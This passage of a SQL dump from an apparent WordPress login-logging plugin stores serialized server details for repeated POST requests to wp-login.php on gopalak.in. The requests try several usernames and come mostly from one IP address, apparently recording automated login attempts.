;s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830139.2292199;s:12:\"REQUEST_TIME\";i:1746830139;}}','13.201.84.118',1,'2025-05-10 04:05:41','2025-05-11 04:14:47'),(95170,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830408.682956;s:12:\"REQUEST_TIME\";i:1746830408;}}','13.201.84.118',1,'2025-05-10 04:10:10','2025-05-11 04:14:48'),(95171,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830408.662549;s:12:\"REQUEST_TIME\";i:1746830408;}}','13.201.84.118',1,'2025-05-10 04:10:10','2025-05-11 04:14:47'),(95172,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830408.6598279;s:12:\"REQUEST_TIME\";i:1746830408;}}','13.201.84.118',1,'2025-05-10 04:10:10','2025-05-11 04:14:47'),(95173,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830408.701087;s:12:\"REQUEST_TIME\";i:1746830408;}}','13.201.84.118',1,'2025-05-10 04:10:10','2025-05-11 04:14:48'),(95174,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830408.693862;s:12:\"REQUEST_TIME\";i:1746830408;}}','13.201.84.118',1,'2025-05-10 04:10:10','2025-05-11 04:14:47'),(95175,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830684.8757601;s:12:\"REQUEST_TIME\";i:1746830684;}}','13.201.84.118',1,'2025-05-10 04:14:47','2025-05-11 04:14:47'),(95176,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"134\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"134\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830684.8763061;s:12:\"REQUEST_TIME\";i:1746830684;}}','13.201.84.118',1,'2025-05-10 04:14:47','2025-05-11 04:14:47'),(95177,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830684.8806119;s:12:\"REQUEST_TIME\";i:1746830684;}}','13.201.84.118',1,'2025-05-10 04:14:47','2025-05-11 04:14:47'),(95178,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"130\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"130\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830686.545634;s:12:\"REQUEST_TIME\";i:1746830686;}}','13.201.84.118',1,'2025-05-10 04:14:48','2025-05-11 04:14:48'),(95179,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"127\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"127\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746830686.5449629;s:12:\"REQUEST_TIME\";i:1746830686;}}','13.201.84.118',1,'2025-05-10 04:14:48','2025-05-11 04:14:48'),(95180,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54743\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storag